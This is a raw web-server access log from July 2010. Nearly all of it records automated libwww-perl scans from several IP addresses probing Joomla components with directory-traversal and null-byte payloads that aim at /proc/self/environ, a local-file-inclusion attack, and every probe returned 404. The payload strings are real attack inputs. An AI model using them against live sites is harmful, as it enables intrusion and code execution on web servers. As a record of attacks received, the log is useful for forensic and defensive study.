91.121.67.226 - - [26/Jul/2010:10:30:22 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:10:30:22 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.247.176.194 - - [26/Jul/2010:10:30:41 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:10:30:41 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:30:50 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:30:50 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:32:57 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
78.41.233.128 - - [26/Jul/2010:10:33:01 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:33:50 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
78.41.233.128 - - [26/Jul/2010:10:33:51 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:35:38 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
78.41.233.128 - - [26/Jul/2010:10:35:44 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:35:55 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
78.41.233.128 - - [26/Jul/2010:10:35:59 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:36:01 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:36:33 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:37:04 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
78.41.233.128 - - [26/Jul/2010:10:39:40 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:39:40 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:39:40 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:10:43:05 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:43:36 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:43:36 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:43:36 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
78.41.233.128 - - [26/Jul/2010:10:43:48 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:43:48 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:43:49 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:47:00 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:47:00 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:47:00 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
62.149.233.199 - - [26/Jul/2010:10:48:05 +0200] "GET /logs/access_log/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
62.149.233.199 - - [26/Jul/2010:10:48:15 +0200] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
62.149.233.199 - - [26/Jul/2010:10:48:15 +0200] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:55:39 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:10:55:40 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.121.67.226 - - [26/Jul/2010:10:55:52 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:10:55:52 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
78.41.233.128 - - [26/Jul/2010:10:56:22 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:56:22 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:10:56:23 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:10:56:24 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:10:57:17 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:57:23 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.121.67.226 - - [26/Jul/2010:10:57:27 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.247.176.194 - - [26/Jul/2010:10:57:33 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
38.108.124.28 - - [26/Jul/2010:10:58:12 +0200] "GET //index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
91.121.67.226 - - [26/Jul/2010:10:58:45 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.247.176.194 - - [26/Jul/2010:10:58:52 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:10:59:19 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
99.198.108.74 - - [26/Jul/2010:10:59:27 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
91.121.67.226 - - [26/Jul/2010:10:59:30 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
99.198.108.74 - - [26/Jul/2010:10:59:32 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
78.41.233.128 - - [26/Jul/2010:10:59:35 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:10:59:44 +0200] "GET /logs/access_log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:10:59:45 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:10:59:45 +0200] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:11:00:15 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:11:04:07 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:11:04:07 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:11:04:07 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:11:04:07 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:11:04:12 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:11:04:12 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:11:04:13 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:11:04:13 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
38.108.124.28 - - [26/Jul/2010:11:04:14 +0200] "GET /logs/access_log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
38.108.124.28 - - [26/Jul/2010:11:04:14 +0200] "GET //index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
38.108.124.28 - - [26/Jul/2010:11:04:14 +0200] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
74.55.73.74 - - [26/Jul/2010:11:15:30 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
81.21.78.22 - - [26/Jul/2010:11:15:39 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:11:16:15 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:11:16:15 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:11:16:15 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
94.247.176.194 - - [26/Jul/2010:11:16:16 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:16:16 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:16:16 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:11:18:29 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:11:18:29 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:11:18:29 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:19:21 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:19:21 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:11:19:21 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
91.121.67.226 - - [26/Jul/2010:11:19:38 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:11:19:38 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:11:19:38 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
78.41.233.128 - - [26/Jul/2010:11:19:39 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:11:19:40 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:11:19:40 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:22:49 +0200] "GET //index.php?option=com_orgchart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
74.55.73.74 - - [26/Jul/2010:11:23:50 +0200] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
99.198.108.74 - - [26/Jul/2010:11:24:12 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:11:24:12 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:11:24:12 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
81.21.78.22 - - [26/Jul/2010:11:24:53 +0200] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:11:25:20 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:11:25:20 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:11:25:20 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
99.198.108.74 - - [26/Jul/2010:11:26:42 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:11:26:42 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:11:26:43 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
24.137.91.88 - - [26/Jul/2010:11:31:56 +0200] "GET / HTTP/1.1" 200 560 "http://livechat.designerlove.com/messages/5767.html" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
74.55.73.74 - - [26/Jul/2010:11:34:16 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:11:34:16 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:11:34:17 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
222.124.193.12 - - [26/Jul/2010:11:38:30 +0200] "GET /logs/access_log//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:38:32 +0200] "GET //index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:38:33 +0200] "GET /logs//index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:41:53 +0200] "GET /logs/access_log//index.php?option=com_orgchart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:41:54 +0200] "GET //index.php?option=com_orgchart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:41:56 +0200] "GET /logs//index.php?option=com_orgchart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:42:44 +0200] "GET /logs/access_log//index.php?option=com_orgchart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:42:45 +0200] "GET //index.php?option=com_orgchart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:42:47 +0200] "GET /logs//index.php?option=com_orgchart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
95.108.150.235 - - [26/Jul/2010:11:44:34 +0200] "GET /robots.txt HTTP/1.1" 404 297 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)"
95.108.150.235 - - [26/Jul/2010:11:44:35 +0200] "GET / HTTP/1.1" 200 560 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)"
95.108.150.235 - - [26/Jul/2010:11:44:36 +0200] "GET / HTTP/1.1" 200 560 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)"
